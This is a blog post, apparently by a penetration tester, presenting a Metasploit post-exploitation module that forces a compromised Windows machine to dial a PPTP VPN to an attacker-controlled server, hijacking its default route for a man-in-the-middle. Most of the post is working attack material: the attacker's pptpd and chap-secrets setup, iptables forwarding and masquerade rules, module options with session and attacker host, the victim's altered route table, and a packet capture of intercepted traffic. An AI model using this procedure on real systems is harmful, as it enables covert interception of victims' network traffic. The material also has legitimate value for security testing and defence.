Recently I made a small post-exploitation module to take advantage of the rasdial Windows client. The idea is to create an outbound VPN connection (pptp) from the "victim" machine to a VPN server configured in the "attacker" machine. Once the pptp tunnel is created we can forward all victim traffic through the tunnel getting a man-in-the-middle attack.
To get this we have to create a temporal .pbk (phonebook file) with certain parameters and force the rasdial client to use that file. The most important parameter to get the MITM is IpPrioritizeRemote. This option allows rasdial to set a new default route pointing to the new VPN peer IP of the attacker host. This new default GW will have a better metric to the default one so this way we will get that all outbound traffic to internet or to an unknown network will go through our machine. Obviously we need to configure forwarding and masquerading to get a real MITM, which can be easily done with IPTABLES. To make the tests I have used the pptpd package as VPN server from Debian. The simplest configuration is:
ATTACKER MACHINE
root@Mordor:~# tail -2 /etc/pptpd.conf
localip 192.168.0.1
remoteip 192.168.0.234-238
root@Mordor:~# tail -1 /etc/ppp/chap-secrets
msf * m3taSpl01t *
root@Mordor:~# /etc/init.d/pptpd restart && netstat -putan | grep 1723
Restarting PPTP:
Stopping PPTP: pptpd.
Starting PPTP Daemon: pptpd.
tcp 0 0 0.0.0.0:1723 0.0.0.0:* LISTEN 22027/pptpd
root@Mordor:~# iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
root@Mordor:~# iptables -A FORWARD -i ppp0 -o wlan0 -j ACCEPT
root@Mordor:~# iptables -A FORWARD -i wlan0 -o ppp0 -m state --state ESTABLISHED,RELATED -j ACCEPT
root@Mordor:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@Mordor:~# ifconfig wlan0 | grep 82
inet addr:192.168.1.82 Bcast:192.168.1.255 Mask:255.255.255.0
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
192.168.1.0 0.0.0.0 255.255.255.0 U 0 0 0 wlan0
0.0.0.0 192.168.1.1 0.0.0.0 UG 0 0 0 wlan0
VICTIM MACHINE
C:\Documents and Settings\Peregrino>ipconfig
Configuración IP de Windows
Adaptador Ethernet Conexiones de red inalámbricas :
Sufijo de conexión específica DNS :
Dirección IP. . . . . . . . . . . : 192.168.1.131
Máscara de subred . . . . . . . . : 255.255.255.0
Puerta de enlace predeterminada : 192.168.1.1
C:\Documents and Settings\Peregrino>route PRINT
============================== ============================== ===============
Rutas activas:
Destino de red Máscara de red Puerta de acceso Interfaz Métrica
0.0.0.0 0.0.0.0 192.168.1.1 192.168.1.131 25
127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1
192.168.1.0 255.255.255.0 192.168.1.131 192.168.1.131 25
192.168.1.131 255.255.255.255 127.0.0.1 127.0.0.1 25
192.168.1.255 255.255.255.255 192.168.1.131 192.168.1.131 25
...
PPTP uses a TCP port as control channel and GRE to send encapsulated data so port 53 and 1723 must be reachable. Take this into account if you use it over WAN.
With this configuration you only need to run the module with the previous parameters (username and password):
msf post(pptp_tunnel) > set PASSWORD M3taSpl01t
PASSWORD => M3taSpl01t
msf post(pptp_tunnel) > set USERNAME bmerino
USERNAME => bmerino
msf post(pptp_tunnel) > set RHOST 192.168.1.82
RHOST => 192.168.1.82
msf post(pptp_tunnel) > set session 1
session => 1
msf post(pptp_tunnel) > run
[+] PhoneBook configuration written to C:\DOCUME~1\PEREGR~1\CONFIG~1\Temp\UotYzylPVA.pbk
[*] 60
[*] Establishing connection ...
[+] Connection Successful
[*] Phonebook deleted
[*] Post module execution completed
Once the tunnel has been created we can see the new interface in our evil host:
root@Mordor:~# ifconfig ppp0 | grep Link -A 1
ppp0 Link encap:Point-to-Point Protocol
inet addr:192.168.0.1 P-t-P:192.168.0.234 Mask:255.255.255.255
And we can see the new interface and the new route in the victim machine:
C:\Documents and Settings\Peregrino>ipconfig
Configuración IP de Windows
Adaptador Ethernet Conexiones de red inalámbricas :
Sufijo de conexión específica DNS :
Dirección IP. . . . . . . . . . . : 192.168.1.131
Máscara de subred . . . . . . . . : 255.255.255.0
Puerta de enlace predeterminada : 192.168.1.1
Adaptador PPP {34B7C931-D079-4817-8B5D- 93A3C8CE6890} :
Sufijo de conexión específica DNS :
Dirección IP. . . . . . . . . . . : 192.168.0.234
Máscara de subred . . . . . . . . : 255.255.255.255
Puerta de enlace predeterminada : 192.168.0.234
C:\Documents and Settings\Peregrino>route PRINT
============================== ============================== ===============
Rutas activas:
Destino de red Máscara de red Puerta de acceso Interfaz Métrica
0.0.0.0 0.0.0.0 192.168.0.234 192.168.0.234 1
0.0.0.0 0.0.0.0 192.168.1.1 192.168.1.131 26
127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1
192.168.0.234 255.255.255.255 127.0.0.1 127.0.0.1 50
192.168.0.255 255.255.255.255 192.168.0.234 192.168.0.234 50
192.168.1.0 255.255.255.0 192.168.1.131 192.168.1.131 25
192.168.1.82 255.255.255.255 192.168.1.131 192.168.1.131 25
...
...
The new default route has a metric of 1 and is pointing to the recently VPN interface. Now, if we leave tshark running in our wlan0 interface we could see all the outbound traffic of that host:
C:\Documents and Settings\Peregrino>ping www.metasploit.com
Haciendo ping a www.metasploit.com [208.118.237.137] con 32 bytes de datos:
Respuesta desde 208.118.237.137: bytes=32 tiempo=171ms TTL=47
Respuesta desde 208.118.237.137: bytes=32 tiempo=175ms TTL=47
...
Respuesta desde 208.118.237.137: bytes=32 tiempo=171ms TTL=47
Respuesta desde 208.118.237.137: bytes=32 tiempo=175ms TTL=47
...
root@Mordor:~# tshark -i wlan0 -R icmp
Capturing on wlan0
8.833077 192.168.1.82 -> 208.118.237.137 ICMP Echo (ping) request
8.993497 208.118.237.137 -> 192.168.1.82 ICMP Echo (ping) reply
9.837086 192.168.1.82 -> 208.118.237.137 ICMP Echo (ping) request
9.999374 208.118.237.137 -> 192.168.1.82 ICMP Echo (ping) reply
10.837070 192.168.1.82 -> 208.118.237.137 ICMP Echo (ping) request
10.992455 208.118.237.137 -> 192.168.1.82 ICMP Echo (ping) reply
Here I leave a How-to video:
is it possible to implement this method trought a reverse_https or firewall???
ReplyDeletethis method is fantastic ... :-)
ReplyDelete